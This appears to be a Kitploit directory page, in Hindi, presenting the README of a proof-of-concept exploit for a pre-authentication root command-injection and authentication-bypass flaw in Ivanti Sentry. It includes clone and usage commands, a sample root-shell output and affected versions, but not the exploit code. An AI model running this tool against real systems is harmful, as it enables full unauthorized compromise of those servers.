Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-10520 — CVE-2026-10520 | Kitploit
उपकरण/GitHubGitHub/0xblackash/cve-2026-10520
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHub0xblackash/cve-2026-10520

CVE-2026-10520

CVE-2026-10520

रिपॉजिटरी देखें
4593 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🎯 CVE-2026-10520 और CVE-2026-10523 - Ivanti Sentry

ChatGPT Image Jun 11, 2026, 11_19_12 AM

Ivanti Sentry Critical RCE

प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन + प्रमाणीकरण बायपास

लेखक: Ashraf Zaryouh "0xBlackash"

GitHub


📌 अवलोकन

दो गंभीर कमजोरियाँ Ivanti Sentry (पूर्व में MobileIron Sentry) को प्रभावित करती हैं:

  • CVE-2026-10520 → CVSS 10.0 - प्री-ऑथ OS कमांड इंजेक्शन (रूट के रूप में RCE)
  • CVE-2026-10523 → CVSS 9.9 - प्रमाणीकरण बायपास

ये खामियाँ अनप्रमाणित हमलावरों को पूर्ण सिस्टम से समझौता करने की अनुमति देती हैं।


✨ विशेषताएँ

  • ✅ स्वच्छ और तेज़ PoC
  • ✅ प्री-ऑथेंटिकेशन (कोई क्रेडेंशियल आवश्यक नहीं)
  • ✅ रूट-स्तरीय कमांड निष्पादन
  • ✅ विस्तृत आउटपुट फॉर्मेटिंग
  • ✅ प्रॉक्सी समर्थन
  • ✅ वर्बोज़ मोड
  • ✅ सुंदर टर्मिनल UI

🚀 उपयोग

python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>

उदाहरण

# Basic usage
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"

# Verbose mode
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v

# With proxy
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080

# Check kernel
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"

📋 विकल्प

तर्कविवरणआवश्यक
--urlलक्ष्य URL (जैसे https://target:8443)हाँ
--cmdनिष्पादित करने का कमांडहाँ
-v, --verboseवर्बोज़ आउटपुट सक्षम करेंनहीं
--proxyHTTP प्रॉक्सी (होस्ट:पोर्ट)नहीं

🛠️ स्थापना

git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py

📷 सफल शोषण

जब यह असुरक्षित हो, तो आप देखेंगे:


 ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
  
          CVE-2026-10520 & CVE-2026-10523 PoC Exploit
          Ivanti Sentry Pre-Auth RCE + Auth Bypass
          
          Author: Ashraf Zaryouh "0xBlackash"
          GitHub: https://github.com/0xBlackash


[+] Target is VULNERABLE!
Command Output:
uid=0(root) gid=0(root) groups=0(root)

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं, अवैध है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।


🔧 प्रभावित संस्करण

  • Ivanti Sentry 10.5.2, 10.6.2, 10.7.1 से पहले

ठीक किया गया: 10.5.2 / 10.6.2 / 10.7.1


📜 संदर्भ

  • आधिकारिक Ivanti सलाह
  • watchTowr Labs मूल शोध
  • NVD प्रविष्टियाँ: CVE-2026-10520, CVE-2026-10523

❤️ के साथ बनाया गया Ashraf Zaryouh "0xBlackash" द्वारा

यदि आपको यह उपयोगी लगा तो रेपो को स्टार करें! ⭐

टूल डाउनलोड करें